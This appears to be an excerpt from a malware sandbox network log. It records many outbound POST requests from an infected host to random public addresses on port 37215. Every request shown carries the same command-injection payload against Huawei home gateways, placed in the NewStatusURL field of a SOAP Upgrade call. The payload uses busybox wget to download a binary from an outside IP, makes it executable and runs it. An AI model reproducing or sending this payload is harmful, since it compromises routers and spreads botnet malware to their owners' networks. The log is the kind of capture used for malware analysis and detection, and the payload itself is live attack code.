                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1374192.168.2.1537222122.159.145.8737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399390936 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1375192.168.2.1537074186.174.40.9737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399410009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1376192.168.2.1543118222.13.64.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399444103 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1377192.168.2.1543880121.206.133.4337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399451971 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1378192.168.2.1546944222.233.208.7037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399461031 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1379192.168.2.1548396122.177.215.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399498940 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1380192.168.2.1534110186.166.39.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399503946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1381192.168.2.1547194138.118.54.11537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399524927 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1382192.168.2.154094237.237.253.14237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399540901 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1383192.168.2.153724494.151.221.24237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399559021 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
